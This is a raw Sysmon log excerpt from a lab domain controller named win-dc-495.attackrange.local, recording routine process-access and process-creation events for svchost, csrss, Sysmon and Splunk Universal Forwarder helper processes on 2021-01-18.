13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.145{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.957{59A5CD1D-92B0-6005-C004-00000000A301}45203152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.816{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.817{59A5CD1D-92B0-6005-C004-00000000A301}4520C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.285{59A5CD1D-92B0-6005-BF04-00000000A301}25163688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 